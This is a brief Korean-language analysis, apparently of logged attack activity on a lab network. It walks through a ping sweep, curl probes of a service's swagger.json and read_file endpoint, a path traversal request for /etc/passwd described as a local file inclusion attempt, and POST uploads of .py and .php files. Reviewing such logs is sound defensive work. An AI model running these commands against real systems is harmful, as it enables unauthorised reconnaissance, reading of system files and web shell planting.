cmd
코드 복사
python netscan.py
netscan.py 라는 Python 스크립트를 실행ping 명령을 자동으로 생성함:cmd
코드 복사
ping -n 1 192.168.100.1
ping -n 1 192.168.100.2
...
ping -n 1 192.168.100.255
🔍 목적: 살아있는 호스트(응답하는 IP) 식별
cmd
코드 복사
curl <http://192.168.100.130:7777/swagger.json>
curl <http://192.168.100.130:7777/read_file>
curl <http://192.168.100.130:7777/read_file?filename=../../../etc/passwd>
🔍 분석:
curl로 접근../)을 시도해 민감한 파일 접근 (/etc/passwd)까지 시도 → LFI 취약점 공격 시도cmd
코드 복사
curl -X POST "<http://192.168.100.130:7777/upload>" -F "file=@ZAP_2.14.0_Linux.tar.gz"
curl -X POST "<http://192.168.100.130:7777/upload>" -F "[email protected]"
curl -X POST "<http://192.168.100.130:7777/upload>" -F "[email protected]"
🔍 의도:
.py / .php 파일 업로드 시도